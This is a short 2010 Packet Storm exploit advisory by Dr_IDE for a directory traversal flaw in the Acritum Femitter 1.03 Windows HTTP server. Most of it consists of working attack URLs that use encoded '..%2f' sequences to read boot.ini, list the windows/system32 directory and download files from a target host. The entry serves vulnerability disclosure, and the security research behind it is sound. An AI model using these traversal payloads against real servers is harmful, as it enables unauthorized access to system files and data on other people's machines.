Acritum Femitter 1.03 Directory Traversal

2010-04-20T00:00:00
ID PACKETSTORM:88717
Type packetstorm
Reporter Dr_IDE
Modified 2010-04-20T00:00:00

Description

                                        
                                            `############################################################  
#  
# Acritum Femitter v1.03 Directory Traversal Exploit  
# Found By: Dr_IDE  
# Date: Apr. 20, 2010  
# Tested On: Windows 7  
# Download: http://acritum.com/fem/download.htm  
#  
############################################################  
  
- Description -  
  
Acritum Femitter v1.03 is a Windows based HTTP server. This is the latest  
version of the application available.  
  
Acritum Femitter v1.03 is vulnerable to remote directory traversal attack by the  
following means.  
  
- Technical Details -  
http://[webserver IP]/[\../]  
  
http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini <- File Access  
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32 <- Full Directory Listing  
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe <- File Download  
  
#[pocoftheday.blogspot.com]  
  
`